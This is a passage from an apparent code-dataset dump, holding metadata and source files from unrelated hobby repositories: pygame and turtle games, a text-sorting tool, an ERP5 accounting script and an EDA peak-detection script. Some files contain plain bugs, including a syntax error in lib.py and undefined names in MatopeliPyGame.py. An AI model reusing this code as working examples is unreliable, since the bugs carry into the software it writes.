c==d or a==c or a==d or b==d:\n\t\tprint(\"No digits can repeat!\")\n\t\tguess=int(input(\"Guess the 4-digit code:\"))\n\t\ta,b,c,d = list(str(guess))\n\tif a==A:\n\t\ton+=1\n\tif b==B:\n\t\ton+=1\n\tif c==C:\n\t\ton+=1\n\tif d==D:\n\t\ton+=1\n\tif a==B or a==C or a ==D:\n\t\tpresent+=1\n\tif b==A or b==C or b==D:\n\t\tpresent+=1\n\tif c==A or c==B or c==D:\n\t\tpresent+=1\n\tif d==A or d==B or d==C:\n\t\tpresent+=1\n\tpresent = present\n\tif on==4:\n\t\tprint(\"You guessed correctly!\")\n\telse:\n\t\tprint(\"Number of digits in the right place:\",on)\n\t\tprint(\"Number of digits guessed correctly but in the wrong place:\",present)\n"
}
] | 2 |
MarzellT/naegal | https://github.com/MarzellT/naegal | c12880ceded91f760b69652289301b9a0e124cb4 | c2ead27d795be06c36f9d7cd0f4781ce785ca5dd | 29c474bbc988ffa0e6d8cb49cab20cb8d1a50784 | refs/heads/master | 2020-05-21T11:07:26.305152 | 2019-05-24T12:49:33 | 2019-05-24T12:49:33 | 186,028,703 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5454747080802917,
"alphanum_fraction": 0.5505767464637756,
"avg_line_length": 33.022640228271484,
"blob_id": "d82f4c74a72d962d3473e11c8702712396a04aef",
"content_id": "dba9f1b1822baf9de48d03b761c673fbe028ed41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9016,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 265,
"path": "/naegal.py",
"repo_name": "MarzellT/naegal",
"src_encoding": "UTF-8",
"text": "\"\"\" Docstring: A program to sort entries of a given list.\n\nThis program will search for given keywords in a text file and then uses them\nto list them in entries and print them in a textfile.\n\"\"\"\n\n__author__ = \"Philipp Fischborn ,Tobias Marzell\"\n__credits__ = \"\"\n__email__ = \"[email protected] ,[email protected]\"\n\n\nclass Entry():\n \"\"\" Class that contains the information of the entries. \"\"\"\n def __init__(self, values, row):\n self.value = []\n for i in range(len(values)):\n self.value.append(values[i].strip())\n self.row = row\n\n def getValue(self, x):\n \"\"\" Returns the xth value of the entry. \"\"\"\n return self.value[x]\n\n def getAllValues(self):\n \"\"\" Returns all entries of the entry. \"\"\"\n self.values = []\n for i in range(len(self.value)):\n self.values.append(self.value[i])\n return self.values\n\n def getRow(self):\n \"\"\" Returns the row of the entry. \"\"\"\n return self.row\n\n def __str__(self):\n return str(self.getAllValues())\n\n def __repr__(self):\n return str(self.getAllValues())\n\nclass Count_class():\n \"\"\" This class contains the information of counted entries.\n\n This class will contain all the information of a given rows unique objects\n with their respective keys.\n \"\"\"\n\n def __init__(self, unique_items_row, representant):\n \"\"\" Enter the row index of which the values should be stored. \"\"\"\n self.all_items = []\n self.restricted_items = []\n self.representant = representant\n\n def append_to_all_items(self, item):\n \"\"\" Appends the item to the classes all list. \"\"\"\n self.all_items.append(item)\n\n def append_to_restricted_items(self, item):\n \"\"\" Appends the item to the classes restricted list. \"\"\"\n self.restricted_items.append(item)\n\n def getIndex(self):\n \"\"\" Returns the index of the current Count_class object. \"\"\"\n return self.unique_items_row\n\n def get_all_items(self):\n \"\"\" Returns the items all list. \"\"\"\n return self.all_items\n\n def get_restricted_items(self):\n \"\"\" Returns the items restricted list. \"\"\"\n return self.restricted_items\n\n def getRepresentant(self):\n \"\"\" Returns the name which the class represents. \"\"\"\n return self.representant\n\n \ndef first_line(inputfile):\n \"\"\" Returns the first row of the file. \"\"\"\n file = open(inputfile, \"r\")\n lines = file.readlines()\n line = lines[0]\n return line\n\ndef read_text(inputfile):\n \"\"\" Returns the entire rows of the entire file as list. \"\"\"\n file = open(inputfile, \"r\")\n return file.readlines()\n\ndef get_entry_pos(anal, keywords):\n \"\"\" Returns position of keywords(as list) in the string.\"\"\"\n pos = []\n end = []\n for i in range(len(keywords)):\n pos.append(anal.find(keywords[i]))\n end.append(pos[i] + len(keywords[i]) - 1)\n # Search for beginnig |\n for i in range(len(pos)):\n helpstr = anal\n j = 1\n while True:\n if not helpstr[pos[i] - j] == \"|\":\n j = j + 1\n else:\n break\n pos[i] = pos[i] - j + 1\n # Search for ending |\n for i in range(len(end)):\n helpstr = anal\n j = 1\n while True:\n if not helpstr[end[i] + j] == \"|\":\n j = j + 1\n else:\n break\n end[i] = end[i] + j - 1\n \n return pos, end\n \ndef setup():\n \"\"\" Sets up the text file and the first line. \"\"\"\n textfile = input(\"File: \")\n textfile = textfile + \".txt\"\n anal = first_line(textfile)\n keywords = input(\"Keywords (split with ','): \").split(\",\")\n pos, end = get_entry_pos(anal, keywords)\n text = read_text(textfile)\n entries = []\n for i in range(len(text)):\n helpstr = []\n for j in range(len(keywords)):\n helpstr.append(text[i])\n helpstr[j] = helpstr[j][pos[j]:(end[j] + 1)]\n entries.append(Entry(helpstr, text[i]))\n return pos, end, text, entries, keywords, anal\n\ndef getRowitems(entries, x):\n \"\"\" Returns a list of all different items of the row(x) in entries. \"\"\"\n row = []\n for i in range(len(entries)):\n if not entries[i].getValue(x) in row:\n row.append(entries[i].getValue(x))\n\n # Create string with \"-\" or \" \" times the length of the current row\n deleteString1 = \"\"\n deleteString2 = \"\"\n for i in range(len(row[0])):\n deleteString1 += \"-\"\n deleteString2 += \" \"\n # Remove all irrelevant entries.\n temp = row\n i = len(temp)\n while i >= 0:\n if i < len(temp):\n if row[i] == deleteString1 or row[i] == \"\" or row[i] == temp[0] \\\n or row[i] == deleteString2:\n row.pop(i)\n i -= 1\n return row\n\ndef sort_by(entries, first_line):\n \"\"\" Function that returns all blocked entries of the row(number). \"\"\"\n rows = input(\"Enter the index of each row (split with ','): \").\\\n split(\",\")\n key = input(\"Enter the keys to sort by: \")\n returnlist = []\n helplist = []\n returnlist.append(first_line)\n for i in range(len(entries)):\n flag = 0\n for j in range(len(rows)):\n if key == entries[i].getValue(int(rows[j])):\n flag +=1\n if flag == len(rows):\n returnlist.append(entries[i].getRow())\n helplist.append(\"Number of entries: \" + str(len(returnlist)) + \"\\n\")\n returnlist = helplist + returnlist\n return returnlist\n\ndef count_by(entries):\n \"\"\" Function that displays the % of the users inputs blocked entries. \"\"\"\n help = \"Enter the index of the rows which are to be calculated \" + \\\n \"(the first row is the row which will be cycled through, all the\" +\\\n \" following rows are the rows which contain the Keyword. \\nRows: \"\n rows = input(help).split(\",\")\n for i in range(len(rows)):\n rows[i] = int(rows[i])\n key = input(\"Enter the key to look for: \")\n unique_row_items = getRowitems(entries, 0)\n count_row_list = []\n for i in range(len(unique_row_items)):\n count_row_list.append(Count_class(i, unique_row_items[i]))\n for i in range(len(entries) - 1):\n x = 0\n for j in range(len(unique_row_items)):\n if count_row_list[j].getRepresentant() == \\\n entries[i + 1].getValue(0):\n x = j\n count_row_list[x].append_to_all_items([entries[i + 1]])\n k = 1\n flag = 0\n while k < len(rows):\n #print(key, entries[i + 1].getValue(k))\n if not key == entries[i + 1].getValue(rows[k]):\n flag = 1\n k += 1\n if flag == 0:\n count_row_list[x].append_to_restricted_items([entries[i + 1]])\n percentage_list = []\n for i in range(len(count_row_list)):\n if not len(count_row_list[i].get_restricted_items()) == 0:\n percentage_list.append(str([count_row_list[i].getRepresentant(), \\\n (len(count_row_list[i].get_restricted_items())/\\\n len(count_row_list[i].get_all_items()) * 100)])\\\n + \"\\n\")\n else:\n percentage_list.append(str([count_row_list[i]\\\n .getRepresentant(), 0]) + \"\\n\")\n return percentage_list\n\ndef write_to_file(write_string):\n \"\"\" Prints the given string in user input's file. \"\"\"\n file = input(\"Enter the file name which you want to save to: \")\n file += \".txt\"\n file = open(file, \"w\", newline = \"\\n\")\n for i in range(len(write_string)):\n file.write(write_string[i])\n file.close()\n\ndef cli(pos, end, text, entries, keywords, rowitems, first_line):\n \"\"\" This is the cli of the program. \"\"\"\n while True:\n print(\"Valid inputs: \\n0: Shows the available rows. \\n\" + \\\n \"1: Writes all the entries which contain a given keyword \" +\n \"in the selected row into a text file. \\n\" +\n \"2: Writes the occurence of a keyword in given rows as % \" +\\\n \"relative to all occurences of the certain row. \\n\" +\n \"Exit with either 'e' or 'exit'.\")\n user_input = input(\"Enter the operation that you want to do: \")\n if user_input == \"0\":\n for i in range(len(pos)):\n print(\"row[\" + str(i) + \"]:\", keywords[i])\n if user_input == \"1\":\n write_to_file(sort_by(entries, first_line))\n if user_input == \"2\":\n write_to_file(count_by(entries))\n if user_input == \"exit\" or user_input == \"e\":\n break\n \n\ndef main():\n \"\"\" Main function. \"\"\"\n pos, end, text, entries, keywords, first_line = setup()\n row_items = []\n for i in range(len(pos)):\n row_items.append(getRowitems(entries, i))\n print(\"row[\" + str(i) + \"]:\", keywords[i])\n\n cli(pos, end, text, entries, keywords, row_items, first_line)\n \n input(\"Exit by pressing enter.\")\n\nif __name__ == '__main__':\n main()\n"
}
] | 1 |
slipslop/GameProjects | https://github.com/slipslop/GameProjects | ad2307e0b2e716fd3b3b505ee2778704f34628bc | ca578142a8a0fc219e85d683ef9c223e7d572ae9 | ffd381b5f14a26f58f3300189e9950c6fdbd7472 | refs/heads/master | 2020-04-02T09:08:40.714031 | 2018-10-31T06:42:10 | 2018-10-31T06:42:10 | 153,582,777 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8311688303947449,
"alphanum_fraction": 0.8311688303947449,
"avg_line_length": 37.5,
"blob_id": "e9f6748708a844b5be14dde535e4cfe67ec55e14",
"content_id": "f6af8340ddcff824f0723cb6608ec63c1e832f71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 77,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 2,
"path": "/README.md",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "# GameProjects\nGame projects made with TurtleGraphics and Pygame - libraries\n"
},
{
"alpha_fraction": 0.4998187720775604,
"alphanum_fraction": 0.5353388786315918,
"avg_line_length": 20.83333396911621,
"blob_id": "216511a4a5befbfdc701899110e7558eb07d6a9a",
"content_id": "f4fbcc356e44f6e7d2ce96fa374bb0bb9ffa6461",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2759,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 126,
"path": "/Omatekoinenpeli.py",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "import turtle\nimport math\nimport random\n\n\nwn = turtle.Screen()\nwn.bgcolor(\"black\")\nwn.title(\"Simple Object Motion Template\")\n\nclass Player(turtle.Turtle):\n\n def __init__(self):\n turtle.Turtle.__init__(self)\n self.color(\"white\")\n self.shape(\"triangle\")\n self.penup()\n self.speed(0)\n self.thrust = 1\n self.friction = 0.99\n self.dx = 0\n self.dy = 0\n\n def move(self):\n self.dx *= self.friction\n self.dy *= self.friction\n self.goto(self.xcor()+self.dx, self.ycor()+self.dy)\n\n\n # boundary detection\n if self.xcor() > 350:\n self.setx(350)\n # self.rt(60)\n if self.xcor() < -350:\n self.setx(-350)\n # self.rt(60)\n if self.ycor() > 350:\n self.sety(350)\n # self.rt(60)\n if self.ycor() < -350:\n self.sety(-350)\n # self.rt(60)\n\n def turnleft(self):\n self.left(45)\n def turnright(self):\n self.right(45)\n def accelerate(self):\n h = self.heading()\n self.dx += math.cos(h*math.pi/180)*self.thrust\n self.dy += math.sin(h*math.pi/180)*self.thrust\n\n\nclass Food(turtle.Turtle):\n\n def __init__(self):\n turtle.Turtle.__init__(self)\n self.color(\"red\")\n self.speed(0)\n self.shape(\"square\")\n self.shapesize(stretch_len=0.8, stretch_wid=0.8)\n self.penup()\n self.goto(random.randint(0,300), random.randint(0,300))\n food = []\n for i in range(4):\n food.append(Food)\n\n\n\n\n\n\n\n\nclass Game():\n def __init__(self):\n self.pen = turtle.Turtle()\n\n def draw_border(self):\n # draw border\n self.pen.speed(0)\n self.pen.color(\"white\")\n self.pen.pensize(3)\n self.pen.penup()\n self.pen.goto(-350, 350)\n self.pen.pendown()\n for side in range(4):\n self.pen.fd(700)\n self.pen.rt(90)\n self.pen.penup()\n self.pen.ht()\n self.pen.pendown()\n\ndef is_collision(food, player):\n if (food.xcor() >= (player.xcor() - 20)) and \\\n (food.xcor() <= (player.xcor() + 20)) and \\\n (food.ycor() >= (player.ycor() - 20)) and \\\n (food.ycor() <= (player.ycor() + 20)):\n return True\n else:\n return False\n\n\n\nplayer = Player()\ngame = Game()\ngame.draw_border()\n\nfood = Food()\n\n\nturtle.listen()\nturtle.onkey(player.turnleft, \"Left\")\nturtle.onkey(player.turnright, \"Right\")\nturtle.onkey(player.accelerate, \"Up\")\n\n# wn.tracer(0)\n\nwhile True:\n wn.update()\n player.move()\n\n # collision checking between player and food\n if is_collision(food, player):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n food.goto(x, y)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5564853549003601,
"alphanum_fraction": 0.6014644503593445,
"avg_line_length": 19.80434799194336,
"blob_id": "a1701cb078da877116e01f5e3247b7f15d1db95a",
"content_id": "d8e98039da5f8807bc55b9e2603d9de70b4ad3f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 46,
"path": "/MatopeliPyGame.py",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "# Learning about classes and objects\n\nimport pygame\nimport random\nimport math\nimport tkinter as tk\nfrom tkinter import messagebox\n\n\n\n\n\ndef drawGrid(w, rows, surface):\n sizeBtwn = w // rows\n\n x = 0\n y = 0\n for l in range(rows):\n x = x + sizeBtwn\n y = y + sizeBtwn\n\n pygame.draw.line(surface, (255, 255, 255), (x, 0), (x, w))\n pygame.draw.line(surface, (255, 255, 255), (0, y), (w, y))\n\ndef redrawWindow(surface):\n global rows, width\n surface.fill((0,0,0))\n drawGrid(width, row, surface)\n pygame.display.update()\n\n\ndef main():\n global width, rows\n width = 500\n\n rows = 20\n win = pygame.display.set_mode((width, width)) # its square\n s = snake((255,0,0), (10, 10))\n flag = True\n clock = pygame.time.Clock()\n # main loop\n\n while flag:\n pygame.time.delay(50) # how fast the game is, the lower the faster\n clock.tick(10) # the lower the slower\n redrawWindow(win)"
},
{
"alpha_fraction": 0.5429677367210388,
"alphanum_fraction": 0.5691219568252563,
"avg_line_length": 27.606870651245117,
"blob_id": "3e34635e2fd57945938735a43dbd063316a749fc",
"content_id": "e66d03d020b7ec87e10bf45b36d0f39ec110e82e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7494,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 262,
"path": "/PyGame.py",
"repo_name": "slipslop/GameProjects",
"src_encoding": "UTF-8",
"text": "import pygame\nimport time\nimport random\n\npygame.init()\n\ndisplay_width = 800\ndisplay_height = 600\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ndark_red = (200, 0, 0)\nblue = (0, 0, 255)\ndark_blue = (0, 0, 200)\n\ncar_width = 64\n\n\n\npause = False\n\n\ngameDisplay = pygame.display.set_mode((display_width, display_height))\npygame.display.set_caption(\"BittiRalli\")\nclock = pygame.time.Clock()\n\ncarImg = pygame.image.load(\"racecar.png\")\npygame.display.set_icon(carImg) # changes the icon top left\n\ndef blocks_dodged(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Dodged: \" + str(count), True, black)\n gameDisplay.blit(text, (0, 0))\n\n\ndef blocks(blockx, blocky, blockw, blockh, color): # draw a block to dodge\n pygame.draw.rect(gameDisplay, color, [blockx, blocky, blockw, blockh])\n\n\n\ndef car(x,y): # shows the car on screen\n gameDisplay.blit(carImg,(x,y)) # draws to the background, what and where? carImg to x,y\n\n# upleft corner is 0,0. as you add to x you move to right. add To y you move down.\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n\ndef message_display(text):\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(text, largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height/2))\n gameDisplay.blit(TextSurface, TextRectangle) # to draw to screen\n pygame.display.update()\n\n time.sleep(2)\n game_loop() # start game loop again\n\ndef crash():\n# crash function, when crashed, it displays a screen with two buttons play again and quit.\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n gameDisplay.fill(white)\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(\"You Crashed\", largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(TextSurface, TextRectangle)\n\n button(\"Play again\", 150, 450, 100, 50, dark_blue, blue, \"play\")\n button(\"Quit\", 550, 450, 100, 50, dark_red, red, \"quit\")\n\n\n\n pygame.display.update()\n clock.tick(15) # wait 15 secs\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n print(mouse) # debugging\n\n click = pygame.mouse.get_pressed()\n\n\n # makes buttons more interactive\n if x+w> mouse[0] > x and y+h > mouse[1] > y:\n pygame.draw.rect(gameDisplay, ac, (x, y, w, h))\n # plays different action according to the button\n if click[0] == 1 and action != None:\n if action == \"play\":\n game_loop()\n elif action == \"quit\":\n pygame.quit()\n quit()\n elif action == \"unpause\":\n unpause()\n else:\n pygame.draw.rect(gameDisplay, ic, (x, y, w, h))\n\n smallText = pygame.font.Font(\"freesansbold.ttf\", 20)\n textSurf, textRect = text_objects(msg , smallText) # smallText = font\n textRect.center = ((x + (w / 2)), (y + (h / 2))) # x + half of the width , y + half of the height\n gameDisplay.blit(textSurf, textRect)\n\ndef unpause():\n global pause\n pause = False\n\n\ndef paused():\n\n\n\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n gameDisplay.fill(white)\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(\"Paused\", largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(TextSurface, TextRectangle)\n\n button(\"Continue\", 150, 450, 100, 50, dark_blue, blue, \"unpause\")\n button(\"Quit\", 550, 450, 100, 50, dark_red, red, \"quit\")\n\n\n\n\n\n\n pygame.display.update()\n clock.tick(15) # wait 15 secs\n\n\n# runs one time before game starts\ndef game_intro():\n\n intro = True\n\n while intro:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n gameDisplay.fill(white)\n largeText = pygame.font.Font(\"freesansbold.ttf\", 70)\n TextSurface, TextRectangle = text_objects(\"Bitti Ralli\", largeText) # run text_objects function\n TextRectangle.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(TextSurface, TextRectangle)\n\n button(\"Play\", 150, 450, 100, 50, dark_blue, blue, \"play\")\n button(\"Quit\", 550, 450, 100, 50, dark_red, red, \"quit\")\n\n\n\n\n\n\n pygame.display.update()\n clock.tick(15) # wait 15 secs\n\ndef game_loop():\n global pause\n\n x = (display_width * 0.45)\n y = (display_height * 0.7)\n\n dx = 0\n dy = 0\n\n block_startx = random.randrange(0, display_width)\n block_starty = -600\n block_speed = 4\n block_width = 100\n block_height = 100\n dodged = 0\n\n gameExit = False\n\n # main game loop\n while not gameExit:\n\n for event in pygame.event.get(): # event handler\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n dx -= 5\n print(\"x is:\" + str(x)) # debugging also\n if event.key == pygame.K_RIGHT:\n dx += 5\n print(\"x is:\" + str(x)) # debugging also\n if event.key == pygame.K_UP:\n dy -= 4\n print(\"y is: \" + str(y))\n if event.key == pygame.K_DOWN:\n dy += 4\n print(\"y is: \" + str(y))\n if event.key == pygame.K_p:\n pause = True\n paused()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n dx = 0\n if event.key == pygame.K_DOWN or event.key == pygame.K_UP:\n dy = 0\n\n x += dx\n y += dy\n # print(event) # <- debugging purposes\n gameDisplay.fill(white)\n\n # drawing\n blocks(block_startx, block_starty, block_width, block_height, black)\n block_starty += block_speed # makes block move!\n car(x,y)\n blocks_dodged(dodged)\n\n # collision detection car and side borders\n if x > display_width - 55 or x < -10:\n crash() # run crash() function\n # collision between car and bottom border and upper\n if y > 444:\n y = 444\n if y < 28:\n y = 28\n\n # when block goes off the screen, print another at random x\n if block_starty > display_height:\n block_starty = 0 - block_height\n block_startx = random.randrange(0, display_width)\n dodged += 1\n block_speed += 0.25\n print(block_speed)\n print(\"block's x is: \" + str(block_startx))\n\n # collision detection between block and car\n if block_startx < x + car_width and block_startx + block_width > x:\n crash()\n\n\n\n\n pygame.display.update()\n clock.tick(60) # fps\n\n\n#uninitialize Pygame\ngame_intro()\ngame_loop()\npygame.quit()\nquit()"
}
] | 4 |
dystudio/erp5 | https://github.com/dystudio/erp5 | 388736153b06c7e494ed9df9ebb41907fced1768 | 21c4706b134584a129b752d9eb15a5cbae04e885 | 8efbfc197097568aba8afb86c65e3ed071426c3f | refs/heads/master | 2021-01-13T11:40:00.978305 | 2016-12-29T23:04:10 | 2016-12-29T23:04:50 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7523961663246155,
"alphanum_fraction": 0.7539936304092407,
"avg_line_length": 30.299999237060547,
"blob_id": "73ba5447558f757eb5e41c959b4bcf14efac3fa1",
"content_id": "6aa0053c400a91f94072fb82c168142eaa988822",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1252,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 40,
"path": "/bt5/erp5_travel_expense/SkinTemplateItem/portal_skins/erp5_hr_request/ExpenseValidationRequest_createPurchaseTransaction.py",
"repo_name": "dystudio/erp5",
"src_encoding": "UTF-8",
"text": "portal = context.getPortalObject()\nstate = context.getSimulationState()\nif (state not in ('accepted')):\n from zExceptions import Unauthorized\n raise Unauthorized\n\nmission_account, debt_account = portal.ERP5Site_getPreferredExpenseAccountTuple()\nif not mission_account:\n context.Base_redirect('view',\n keep_items=dict(\n portal_status_message=portal.Base_translateString(\n \"No Account has been defined for Expenses Transactions\",\n ),\n )\n )\n\ntransaction = portal.accounting_module.newContent(\n portal_type=\"Purchase Invoice Transaction\",\n title=\"\"\"Frais %s\"\"\" % (context.getReference()), \n source_section=context.getDestinationDecision(),\n source_project=context.getSourceProject(),\n destination_section=context.getDestinationSection(),\n resource=context.getPriceCurrency(),\n created_by_builder=1, # XXX this prevent init script from creating lines.\n start_date=DateTime().earliestTime(),\n)\n\ntransaction.newContent(\n portal_type='Purchase Invoice Transaction Line',\n destination=mission_account,\n quantity= (float(context.getTotalPrice())),\n)\n\ntransaction.newContent(\n portal_type='Purchase Invoice Transaction Line',\n destination=debt_account,\n quantity=(-float(context.getTotalPrice())),\n)\n\ntransaction.stop()\n"
}
] | 1 |
StephRoro/hello | https://github.com/StephRoro/hello | e46a98c0d405f8f527e34dc43187137250925e7d | 8aabe592ea2cb07b1bfc86d7d28f30cba255a52a | 42f1bc16e9424974d7592c2ac3564a9d89a603d8 | refs/heads/master | 2023-08-27T17:34:32.687979 | 2021-11-15T15:47:44 | 2021-11-15T15:47:44 | 428,314,195 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5719557404518127,
"alphanum_fraction": 0.5719557404518127,
"avg_line_length": 18.846153259277344,
"blob_id": "4b21d0072f0326562fc27a91949301602eab5066",
"content_id": "90ae9aedb40ee1f727376b2286e6c0e4c3023c4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 13,
"path": "/mlproject/lib.py",
"repo_name": "StephRoro/hello",
"src_encoding": "UTF-8",
"text": "# mlproject/lib.py\n\ndef hello_world():\n return \"Hello world from mlproject\"\n\n\ndef try_me() :\n print(\"tell me what the fuck\")\n result=input()\n if result == what the fuck:\n print(\"tkt frero\")\n else:\n print(\"tell me what the fuck\")\n \n \n"
},
{
"alpha_fraction": 0.6940298676490784,
"alphanum_fraction": 0.7238805890083313,
"avg_line_length": 21.33333396911621,
"blob_id": "6b81d1dd85316bf3303ffe340c82a00e3511ad20",
"content_id": "8e9f55ffb5c744ca97cd02aced365735f91ad584",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 6,
"path": "/tests/test_distance.py",
"repo_name": "StephRoro/hello",
"src_encoding": "UTF-8",
"text": "# tests/test_lib.py\nfrom mlproject.distance import haversine\n\n\ndef test_type_distance():\n assert type(haversine(2,3,4,5)) == float\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5036231875419617,
"avg_line_length": 18.714284896850586,
"blob_id": "49d30fd682f91a1a686b8b37a1a13344e1f5004b",
"content_id": "cbb846821bb978d1529db048bd0392dcb7b710d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 14,
"path": "/scripts/mlproject-run",
"repo_name": "StephRoro/hello",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef try_me() :\n print(\"tell me what the fuck\")\n result=input()\n if result == \"what the fuck\":\n print(\"tkt frero\")\n else:\n print(\"tell me what the fuck\")\n \n \nif __name__ == \"__main__\":\n\ttry_me()\n"
}
] | 3 |
sota-takahashi0731/bachelor | https://github.com/sota-takahashi0731/bachelor | 25a618366983e366ea87304fd05a2d03ff823105 | 4c965b9209b261c78c2f04d987b23ddaa964074d | 3fce40e6539fac654563878f4c3fb476abe812b0 | refs/heads/master | 2023-03-08T16:06:17.987592 | 2021-02-25T14:34:41 | 2021-02-25T14:34:41 | 342,269,900 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5792235136032104,
"alphanum_fraction": 0.5970619320869446,
"avg_line_length": 35.653846740722656,
"blob_id": "7c8845198222383e383ea465b9fb98045e2500ae",
"content_id": "7947c20b7f6fd9767831e5c68a6e844ad2030d2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3904,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 104,
"path": "/code/EDA_peakdetection.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 30 14:35:19 2020\n\n@author: admin\n\"\"\"\n\nimport pandas as pd\nimport scipy.signal as scisig\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef butter_lowpass(cutoff, fs, order=5):\n # Filtering Helper functions\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = scisig.butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\ndef butter_lowpass_filter(data, cutoff, fs, order=5):\n # Filtering Helper functions\n b, a = butter_lowpass(cutoff, fs, order=order)\n y = scisig.lfilter(b, a, data)\n return y\n\ndef peak_detection(df_EDA):\n f = 4 # サンプリング周波数\n threshold = 0.01 # 閾値(振幅がこれより大きいものをSCRとして検出)\n\n df_EDA['filtered_eda'] = butter_lowpass_filter(df_EDA['EDA'], 1.0, f, order=5)\n EDA_shift = df_EDA['filtered_eda'][1:].values - df_EDA['filtered_eda'][:-1].values\n\n peaks = np.zeros(len(EDA_shift))\n peak_sign = np.sign(EDA_shift)\n bottoms = np.zeros(len(EDA_shift))\n peak_starts = np.zeros(len(EDA_shift))\n\n for i in range(len(EDA_shift)-1):\n if peak_sign[i] == -1 and peak_sign[i+1] == 1:\n bottoms[i+1] = 1\n if peak_sign[i] == 1 and peak_sign[i+1] == -1:\n peaks[i+1] = 1\n\n peak_locs = np.where(peaks == 1)\n bottom_locs = np.where(bottoms == 1)\n df_peak = pd.Series(peak_locs[0], name='Peak')\n df_bottom = pd.Series(bottom_locs[0], name='Bottom')\n\n if df_peak[0] < df_bottom[0]:\n df_peak = df_peak[1:].reset_index(drop=True)\n if df_peak[len(df_peak)-1] < df_bottom[len(df_bottom)-1]:\n df_bottom = df_bottom[:-1].reset_index(drop=True)\n\n PeakInfo = pd.concat([df_peak,df_bottom], axis=1)\n PeakInfo['PeakStart'] = PeakInfo['Bottom']\n\n for i in range(len(PeakInfo)-1):\n if i == 0:\n pass\n else:\n if PeakInfo['Peak'][i] - PeakInfo['Peak'][i-1] < 4:\n if df_EDA['filtered_eda'][PeakInfo['Bottom'][i]] >= df_EDA['filtered_eda'][PeakInfo['PeakStart'][i-1]] :\n PeakInfo['PeakStart'][i] = PeakInfo['PeakStart'][i-1]\n else:\n pass\n\n PeakInfo['PeakValue'] = df_EDA['filtered_eda'][PeakInfo['Peak']].reset_index(drop=True)\n PeakInfo['PeakStartValue'] = df_EDA['filtered_eda'][PeakInfo['PeakStart']].reset_index(drop=True)\n PeakInfo['Amplitude'] = PeakInfo['PeakValue'] - PeakInfo['PeakStartValue']\n\n SCR_param = pd.DataFrame()\n SCR_Param = PeakInfo[ PeakInfo['Amplitude'] > threshold ].reset_index(drop=True)\n SCR_Param['RiseTime'] = (SCR_Param['Peak'] - SCR_Param['PeakStart']) / f\n SCR_Param['HalfRecoveryTime'] = 0\n\n half_times = []\n HalfRecovery_window = 100 # 1/2回復時間を探すときのウィンドウ\n\n for i in range(len(SCR_Param)):\n peak_loc = SCR_Param['Peak'][i]\n 